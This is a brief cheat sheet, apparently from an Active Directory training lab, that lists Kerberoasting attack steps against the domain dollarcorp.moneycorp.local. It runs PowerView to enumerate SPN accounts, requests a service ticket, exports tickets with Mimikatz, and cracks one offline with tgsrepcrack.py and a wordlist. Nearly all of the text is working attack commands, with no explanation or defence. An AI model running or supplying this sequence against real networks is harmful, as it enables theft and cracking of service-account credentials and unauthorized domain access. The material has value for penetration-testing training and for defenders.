Find User Accounts

Get-NetUser -SPN

Request Ticket For Service

Add-Type -AssemblyNAme System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

klist

Dump Ticket

Invoke-Mimikatz -Command '"kerberos::list /export"'

Crack Password

python.exe .\\tgsrepcrack.py .\\10k-worst-pass.txt .\\1-40a10000-student648@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi

Deep Dive into Kerberoasting Attack